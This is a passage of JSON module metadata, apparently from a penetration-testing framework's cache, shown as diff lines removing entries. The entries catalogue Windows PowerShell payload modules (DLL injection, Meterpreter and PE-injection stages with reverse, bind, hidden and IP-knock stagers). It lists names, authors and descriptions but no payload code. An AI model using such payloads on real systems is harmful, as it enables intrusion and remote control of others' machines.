"disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp": { - "name": "Powershell Exec, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp": { - "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_named_pipe": { - "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_named_pipe", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp": { - "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_tcp": { - "name": "Powershell Exec, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/find_tag": { - "name": "Powershell Exec, Find Tag Ordinal Stager", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/find_tag", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp": { - "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "spoonm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp": { - "name": "Powershell Exec, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_tcp", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports": { - "name": "Powershell Exec, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns": { - "name": "Powershell Exec, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-https://github.com/EgeBalci/Amber", - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/peinject/bind_hidden_tcp": { - "name": "Powershell Exec, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/peinject/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-https://github.com/EgeBalci/Amber", - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/peinject/bind_ipv6_tcp": { - "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/peinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid", - "aliases": [], 